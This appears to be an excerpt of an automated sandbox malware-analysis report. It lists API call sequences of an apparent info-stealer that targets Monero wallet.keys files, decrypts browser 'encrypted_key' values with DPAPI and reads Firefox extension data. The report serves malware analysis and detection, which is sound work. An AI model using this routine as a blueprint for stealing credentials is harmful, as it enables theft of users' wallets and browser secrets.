                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FAD481
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD698
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FAD72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: ed8558521e283a3d5ba31ed2ee887fb075a3420a61ae9505b07d3361e7f0e5a4
                                    • Instruction ID: 97a5095f78364fe5a44cb746363d28a72755fa6ebdff8f0e5a14d6a14ce74f51
                                    • Opcode Fuzzy Hash: ed8558521e283a3d5ba31ed2ee887fb075a3420a61ae9505b07d3361e7f0e5a4
                                    • Instruction Fuzzy Hash: BC911471910108ABDB18FBA1DDA2EEE733CAF54300F504168F51776491EF38AA59EF62
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FAD801
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD99F
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FADA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 299b5e5ea428c9d010325d4a9e9b81f3168cdafe166e509f187b2823393ca262
                                    • Instruction ID: 78af012414d8f5abf55aee27f16090a95200bec92e1f3b54b17e0c8dd5ea4e16
                                    • Opcode Fuzzy Hash: 299b5e5ea428c9d010325d4a9e9b81f3168cdafe166e509f187b2823393ca262
                                    • Instruction Fuzzy Hash: EB811471910108AADB18FBE1DDA2DEE737CAF54300F504128F417B6491EF38AA59EF62
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00FC1580,00FC0D92), ref: 00FAF54C
                                    • lstrlen.KERNEL32(00000000), ref: 00FAF56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: ef5df7e7c3545d5577e3a33fb479c8c47a4ea68830f2703930e98706493138a5
                                    • Instruction ID: c602c06afe9d84a5030ac66430ada31bd7bef6dcdf73177765a77c051158524f
                                    • Opcode Fuzzy Hash: ef5df7e7c3545d5577e3a33fb479c8c47a4ea68830f2703930e98706493138a5
                                    • Instruction Fuzzy Hash: 17511175D10108BADB14FBA1DC96DED7378AF54300F508528F81667191EF38AA19EFA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: c301c68da10f74e16703cf7bf77b3111b14731782d2629b8af38273f5b91450b
                                    • Instruction ID: 03dd16a2e02a049871077aaed1c43119da02f2cbf38ced554c740e2b8a2f9c8b
                                    • Opcode Fuzzy Hash: c301c68da10f74e16703cf7bf77b3111b14731782d2629b8af38273f5b91450b
                                    • Instruction Fuzzy Hash: B8413F75D10109EBCB08EFE6DD55EEEB779AF44304F108018E41677280EB79AA45EFA2
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FA9D39
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9AEF
                                      • Part of subcall function 00FA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B01
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9B2A
                                      • Part of subcall function 00FA9AC0: LocalFree.KERNEL32(?,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B3F
                                      • Part of subcall function 00FA9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FA9B84
                                      • Part of subcall function 00FA9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FA9BA3
                                      • Part of subcall function 00FA9B60: LocalFree.KERNEL32(?), ref: 00FA9BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 63e8561c3665d70b75704c005eb78914aa1ac8fdcffa490cfb2c50cd49eb79af
                                    • Instruction ID: 2059c88e9b25262a0c2185c2b04fd65f8355bcfc1b6273bee6d0558919e11377
                                    • Opcode Fuzzy Hash: 63e8561c3665d70b75704c005eb78914aa1ac8fdcffa490cfb2c50cd49eb79af
                                    • Instruction Fuzzy Hash: EF316DB6D10209ABCF04DFE4DC86EEFB7B8BF49304F144529E901A7241EB749A54DBA1
                                    APIs
                                    • CreateFileA.KERNEL32(00FB3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00FB3AEE,?), ref: 00FB92FC
                                    • GetFileSizeEx.KERNEL32(000000FF,00FB3AEE), ref: 00FB9319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00FB9327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: c3721234a614ab186a601f15613f2d2b1a5d9c4a02c909a7724b1c717667b397
                                    • Instruction ID: d536d7a4c212c8cb3927b2635e94bfc5e0cdf5f380e5aaaa87c0ecbf3d337368
                                    • Opcode Fuzzy Hash: c3721234a614ab186a601f15613f2d2b1a5d9c4a02c909a7724b1c717667b397
                                    • Instruction Fuzzy Hash: 0EF0AF75E44208BBDB24DFF1EC08F9E77F9AB48720F10C264B621AB2C4D6B196409F50
                                    APIs
                                    • __getptd.LIBCMT ref: 00FBC74E
                                      • Part of subcall function 00FBBF9F: __amsg_exit.LIBCMT ref: 00FBBFAF
                                    • __getptd.LIBCMT ref: 00FBC765
                                    • __amsg_exit.LIBCMT ref: 00FBC773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00FBC797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 56503a2a38b82b7401675de88fc211025f9c125d074bda83bd651ea926c29dc1
                                    • Instruction ID: 486c0d0e046fcf33e8974c39e2e6e7b9c795e56b1e1f87a3169af3331796e446
                                    • Opcode Fuzzy Hash: 56503a2a38b82b7401675de88fc211025f9c125d074bda83bd651ea926c29dc1
                                    • Instruction Fuzzy Hash: 7CF09A32D046059BD725BBBB9C07BEA37A0AF00721F244149F454A71D2DFAC9940BE96
                                    APIs
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4F7A
                                    • lstrcat.KERNEL32(?,00FC1070), ref: 00FB4F97
                                    • lstrcat.KERNEL32(?,008C8E60), ref: 00FB4FAB
                                    • lstrcat.KERNEL32(?,00FC1074), ref: 00FB4FBD
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB492C
                                      • Part of subcall function 00FB4910: FindFirstFileA.KERNEL32(?,?), ref: 00FB4943
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FDC), ref: 00FB4971
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FE0), ref: 00FB4987
                                      • Part of subcall function 00FB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FB4B7D
                                      • Part of subcall function 00FB4910: FindClose.KERNEL32(000000FF), ref: 00FB4B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 331960265713821592a71db78d2d1442dd483ba44454afab2185220d1025a306
                                    • Instruction ID: 2f689bfd17f519a929779ae6f1b5d99b18a4399dfd4f3e43260afc2a64691be4
                                    • Opcode Fuzzy Hash: 331960265713821592a71db78d2d1442dd483ba44454afab2185220d1025a306
                                    • Instruction Fuzzy Hash: 5A21887A900208ABC768F7E0EC46EE937BCAF54700F004558B65997185EF789AC9DF92